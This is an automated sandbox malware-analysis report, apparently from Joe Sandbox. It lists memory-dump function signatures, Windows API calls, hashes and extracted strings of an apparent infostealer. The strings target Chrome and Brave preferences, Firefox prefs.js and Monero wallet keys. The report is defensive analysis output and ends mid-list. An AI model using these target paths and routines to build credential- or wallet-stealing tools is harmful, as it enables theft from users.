                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                    • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                    • API String ID: 1125553467-2524465048
                                    • Opcode ID: 5838b5a94a1763b76d990bfa62659b07ba32f468611bd3e4266e979727e9b111
                                    • Instruction ID: 47128fa9cf42d01a99c67fbb2d199f571483ee6e754af72fbf4dc87f137e1735
                                    • Opcode Fuzzy Hash: 5838b5a94a1763b76d990bfa62659b07ba32f468611bd3e4266e979727e9b111
                                    • Instruction Fuzzy Hash: C8A11DB2A00218ABDB34DF64DC89FFE7378BF48700F044588E60A96545EB759B84DF62
                                    APIs
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                      • Part of subcall function 00FFA920: lstrcpy.KERNEL32(00000000,?), ref: 00FFA972
                                      • Part of subcall function 00FFA920: lstrcat.KERNEL32(00000000), ref: 00FFA982
                                      • Part of subcall function 00FFA9B0: lstrlen.KERNEL32(?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FFA9C5
                                      • Part of subcall function 00FFA9B0: lstrcpy.KERNEL32(00000000), ref: 00FFAA04
                                      • Part of subcall function 00FFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FFAA12
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                    • FindFirstFileA.KERNEL32(00000000,?,01000B32,01000B2B,00000000,?,?,?,010013F4,01000B2A), ref: 00FEBEF5
                                    • StrCmpCA.SHLWAPI(?,010013F8), ref: 00FEBF4D
                                    • StrCmpCA.SHLWAPI(?,010013FC), ref: 00FEBF63
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FEC7BF
                                    • FindClose.KERNEL32(000000FF), ref: 00FEC7D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                    • API String ID: 3334442632-726946144
                                    • Opcode ID: 37ddc66d14d3ae9e8470f153199efdfe326b185599403f3810cca652a656e0b6
                                    • Instruction ID: d636b484d7a4026720b0628c22be71119e492bab4d0116f9241037912df609c8
                                    • Opcode Fuzzy Hash: 37ddc66d14d3ae9e8470f153199efdfe326b185599403f3810cca652a656e0b6
                                    • Instruction Fuzzy Hash: 8A4256B290010CA7DB14FB60DC96EFD737DAF44300F408558FA0A961A5EF78AB49DB92
                                    APIs
                                    • wsprintfA.USER32 ref: 00FF492C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00FF4943
                                    • StrCmpCA.SHLWAPI(?,01000FDC), ref: 00FF4971
                                    • StrCmpCA.SHLWAPI(?,01000FE0), ref: 00FF4987
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FF4B7D
                                    • FindClose.KERNEL32(000000FF), ref: 00FF4B92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s$%s\%s$%s\*
                                    • API String ID: 180737720-445461498
                                    • Opcode ID: 08fca140e273cc451b0f0949b45674272a6ee2592074cf8f80ea44190e05ddc1
                                    • Instruction ID: 214c224c242bdc9ff6bfd9bf2117cde403cc38d70ef55d1c4c4f57792b55b781
                                    • Opcode Fuzzy Hash: 08fca140e273cc451b0f0949b45674272a6ee2592074cf8f80ea44190e05ddc1
                                    • Instruction Fuzzy Hash: CF612FB2900218ABCB34EFA0EC49EFE7378BF48700F044598F64A96545EB75AB459F91
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00FF4580
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FF4587
                                    • wsprintfA.USER32 ref: 00FF45A6
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00FF45BD
                                    • StrCmpCA.SHLWAPI(?,01000FC4), ref: 00FF45EB
                                    • StrCmpCA.SHLWAPI(?,01000FC8), ref: 00FF4601
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FF468B
                                    • FindClose.KERNEL32(000000FF), ref: 00FF46A0
                                    • lstrcat.KERNEL32(?,0180EAC0), ref: 00FF46C5
                                    • lstrcat.KERNEL32(?,0180D948), ref: 00FF46D8
                                    • lstrlen.KERNEL32(?), ref: 00FF46E5
                                    • lstrlen.KERNEL32(?), ref: 00FF46F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                    • String ID: %s\%s$%s\*
                                    • API String ID: 671575355-2848263008
                                    • Opcode ID: 19735a3d45afc1a0fc0806795f700095c219e4d126222b3a166b3a6ed619e841
                                    • Instruction ID: de517c73258bdb02252e35dc2c5dec324836631ff75f17d8a56414eb08393f21
                                    • Opcode Fuzzy Hash: 19735a3d45afc1a0fc0806795f700095c219e4d126222b3a166b3a6ed619e841
                                    • Instruction Fuzzy Hash: 5B5142B690021CABCB34EF70DC89FFE7378AF58700F404598F60A96594EB749A859F91
                                    APIs
                                    • wsprintfA.USER32 ref: 00FF3EC3
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00FF3EDA
                                    • StrCmpCA.SHLWAPI(?,01000FAC), ref: 00FF3F08
                                    • StrCmpCA.SHLWAPI(?,01000FB0), ref: 00FF3F1E
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FF406C
                                    • FindClose.KERNEL32(000000FF), ref: 00FF4081
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 180737720-4073750446
                                    • Opcode ID: 639650343d233343ed03a0a8b0b2263252da345c1adef5cff5830e068980c417
                                    • Instruction ID: 879585b501ff21cdc68b378a188a4665152c4e009c2210f86ed43f218ce31ee2
                                    • Opcode Fuzzy Hash: 639650343d233343ed03a0a8b0b2263252da345c1adef5cff5830e068980c417
                                    • Instruction Fuzzy Hash: D9510FB6900218ABCB34EFA0DC89EFE7378BF44700F404588F75996454DBB5AB859FA1
                                    APIs
                                    • wsprintfA.USER32 ref: 00FEED3E
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00FEED55
                                    • StrCmpCA.SHLWAPI(?,01001538), ref: 00FEEDAB
                                    • StrCmpCA.SHLWAPI(?,0100153C), ref: 00FEEDC1
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FEF2AE
                                    • FindClose.KERNEL32(000000FF), ref: 00FEF2C3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\*.*
                                    • API String ID: 180737720-1013718255
                                    • Opcode ID: f79e66592a457bcc6ad6845718874da4f70d4d32683303741d950e2d9486bf51
                                    • Instruction ID: ece5a5533fec84c4b25ef4689b2e9f4bc3b4a6019e18b8733c9c38402f9ed5f2
                                    • Opcode Fuzzy Hash: f79e66592a457bcc6ad6845718874da4f70d4d32683303741d950e2d9486bf51
                                    • Instruction Fuzzy Hash: FBE103B291111C9AEB24FB60DC51EFE7338AF54340F4041E9B60E660A6EF746B8ADF51
                                    APIs
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                      • Part of subcall function 00FFA920: lstrcpy.KERNEL32(00000000,?), ref: 00FFA972
                                      • Part of subcall function 00FFA920: lstrcat.KERNEL32(00000000), ref: 00FFA982
                                      • Part of subcall function 00FFA9B0: lstrlen.KERNEL32(?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FFA9C5
                                      • Part of subcall function 00FFA9B0: lstrcpy.KERNEL32(00000000), ref: 00FFAA04
                                      • Part of subcall function 00FFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FFAA12
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,010015B8,01000D96), ref: 00FEF71E
                                    • StrCmpCA.SHLWAPI(?,010015BC), ref: 00FEF76F
                                    • StrCmpCA.SHLWAPI(?,010015C0), ref: 00FEF785
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FEFAB1
                                    • FindClose.KERNEL32(000000FF), ref: 00FEFAC3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: prefs.js
                                    • API String ID: 3334442632-3783873740
                                    • Opcode ID: a90775db2c3edaf5d984b1529b1d26cb9f5f8db92f4f5ad1b49a90ebada0abd4
                                    • Instruction ID: de04804e1316a5151ef40f5673ea023fd8abd262b3fa0b0c4baaf3f9de302ef8
                                    • Opcode Fuzzy Hash: a90775db2c3edaf5d984b1529b1d26cb9f5f8db92f4f5ad1b49a90ebada0abd4
                                    • Instruction Fuzzy Hash: 8DB122B290010C9BDB24FF60DC95EFD7379AF54300F4085A8A50E9B1A5EF786B49DB92
                                    APIs
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0100510C,?,?,?,010051B4,?,?,00000000,?,00000000), ref: 00FE1923
                                    • StrCmpCA.SHLWAPI(?,0100525C), ref: 00FE1973
                                    • StrCmpCA.SHLWAPI(?,01005304), ref: 00FE1989
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FE1D40
                                    • DeleteFileA.KERNEL32(00000000), ref: 00FE1DCA
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FE1E20
                                    • FindClose.KERNEL32(000000FF), ref: 00FE1E32
                                      • Part of subcall function 00FFA920: lstrcpy.KERNEL32(00000000,?), ref: 00FFA972
                                      • Part of subcall function 00FFA920: lstrcat.KERNEL32(00000000), ref: 00FFA982
                                      • Part of subcall function 00FFA9B0: lstrlen.KERNEL32(?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FFA9C5
                                      • Part of subcall function 00FFA9B0: lstrcpy.KERNEL32(00000000), ref: 00FFAA04
                                      • Part of subcall function 00FFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FFAA12
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 1415058207-1173974218
                                    • Opcode ID: 77c3e48ff77b9b2724e7c71e1a71dac2df8a6ec8d4ecaa4650f64227458e84fb
                                    • Instruction ID: 257778fb00b7f30c87c5a06e5958eebe6c1fd2c59ffef3f586bc32c403d102e1
                                    • Opcode Fuzzy Hash: 77c3e48ff77b9b2724e7c71e1a71dac2df8a6ec8d4ecaa4650f64227458e84fb
                                    • Instruction Fuzzy Hash: 821232B191011C9ADB25FB60CC96EFD7378AF14340F4041A9B20E621A5EF786F89DF91
                                    APIs
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                      • Part of subcall function 00FFA9B0: lstrlen.KERNEL32(?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FFA9C5
                                      • Part of subcall function 00FFA9B0: lstrcpy.KERNEL32(00000000), ref: 00FFAA04
                                      • Part of subcall function 00FFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FFAA12
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,01000C2E), ref: 00FEDE5E
                                    • StrCmpCA.SHLWAPI(?,010014C8), ref: 00FEDEAE
                                    • StrCmpCA.SHLWAPI(?,010014CC), ref: 00FEDEC4
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FEE3E0
                                    • FindClose.KERNEL32(000000FF), ref: 00FEE3F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                    • String ID: \*.*
                                    • API String ID: 2325840235-1173974218
                                    • Opcode ID: fc9eac6ad9ff922038173e5a18ed0d6708277d8393130c88722c7296e13790c6
                                    • Instruction ID: bdade67d2e30b1ef343c787a8f7663ac6b4f42ad0aa9bb061a0ad42ae74bfb81
                                    • Opcode Fuzzy Hash: fc9eac6ad9ff922038173e5a18ed0d6708277d8393130c88722c7296e13790c6
                                    • Instruction Fuzzy Hash: 24F1AEB181011C9ADB25EB60DC95EFE7338BF14340F4041E9B60E621A5EF786B8ADF61
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 2kn,$2Yy$:b]$FRw$Mzyn$P)&$hZc$4j}$o?|$u>
                                    • API String ID: 0-303601043
                                    • Opcode ID: 733ebe35abff2ec5ac96a335acbfb821a2732e7f79bbae1f2c06cbf4cf10becb
                                    • Instruction ID: 5915c04eb996d11b48edafa369c70d08036a5f67d016c27dead2956a35974434
                                    • Opcode Fuzzy Hash: 733ebe35abff2ec5ac96a335acbfb821a2732e7f79bbae1f2c06cbf4cf10becb
                                    • Instruction Fuzzy Hash: 57B208F360C2049FE304AE2DEC9567ABBE9EFD4720F1A493DE6C4C3744EA3558058696
                                    APIs
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                      • Part of subcall function 00FFA920: lstrcpy.KERNEL32(00000000,?), ref: 00FFA972
                                      • Part of subcall function 00FFA920: lstrcat.KERNEL32(00000000), ref: 00FFA982
                                      • Part of subcall function 00FFA9B0: lstrlen.KERNEL32(?,01809130,?,\Monero\wallet.keys,01000E17), ref: 00FFA9C5
                                      • Part of subcall function 00FFA9B0: lstrcpy.KERNEL32(00000000), ref: 00FFAA04
                                      • Part of subcall function 00FFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FFAA12
                                      • Part of subcall function 00FFA8A0: lstrcpy.KERNEL32(?,01000E17), ref: 00FFA905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,010014B0,01000C2A), ref: 00FEDAEB
                                    • StrCmpCA.SHLWAPI(?,010014B4), ref: 00FEDB33
                                    • StrCmpCA.SHLWAPI(?,010014B8), ref: 00FEDB49
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FEDDCC
                                    • FindClose.KERNEL32(000000FF), ref: 00FEDDDE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 3334442632-0
                                    • Opcode ID: de883387bb290b00900f77eaff5f83be718ead63b56bf52ed205bb97d062a95c
                                    • Instruction ID: 8c83c693737ca0153390e7eb9c798d4340969d8305bc14f04f56f46813c36a3e
                                    • Opcode Fuzzy Hash: de883387bb290b00900f77eaff5f83be718ead63b56bf52ed205bb97d062a95c
                                    • Instruction Fuzzy Hash: 5D9165B2900108A7CB24FB71EC56DFD737DAF84340F008568F90A96595EF78AB19DB92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Q]W$bG;$hl{$ll{$u;",$wG$/w_$G75$}d_
                                    • API String ID: 0-2888110392
                                    • Opcode ID: d8087104b2b17a6b1d38a476806bd6b2b0081fd6f77270b0c7d00283d243adf8
                                    • Instruction ID: 511d539b261509f29dbd90ad15abf0d9cde7c4d1b9dea9f4e1538ee0b2492188
                                    • Opcode Fuzzy Hash: d8087104b2b17a6b1d38a476806bd6b2b0081fd6f77270b0c7d00283d243adf8
                                    • Instruction Fuzzy Hash: 34B205F360C204AFE3046E2DEC8567ABBE9EF94720F1A4A3DE6C4C7744E63558018697
                                    APIs
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                    • GetKeyboardLayoutList.USER32(00000000,00000000,010005AF), ref: 00FF7BE1
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00FF7BF9
                                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 00FF7C0D
                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00FF7C62
                                    • LocalFree.KERNEL32(00000000), ref: 00FF7D22
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                    • String ID: /
                                    • API String ID: 3090951853-4001269591
                                    • Opcode ID: 994f36868555ca8b9cf0e47dd836b7afbdbed7ef149f7af57efa1206ea053a80
                                    • Instruction ID: 8e4ee2d646920771cee53ec4b9815e9b17f9beef394e0335e7d30e80ff2983ee
                                    • Opcode Fuzzy Hash: 994f36868555ca8b9cf0e47dd836b7afbdbed7ef149f7af57efa1206ea053a80
                                    • Instruction Fuzzy Hash: CD4129B194021CABDB24EB94DC99BFEB374EF44700F204199E209662A0DB742F85DFA1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmp
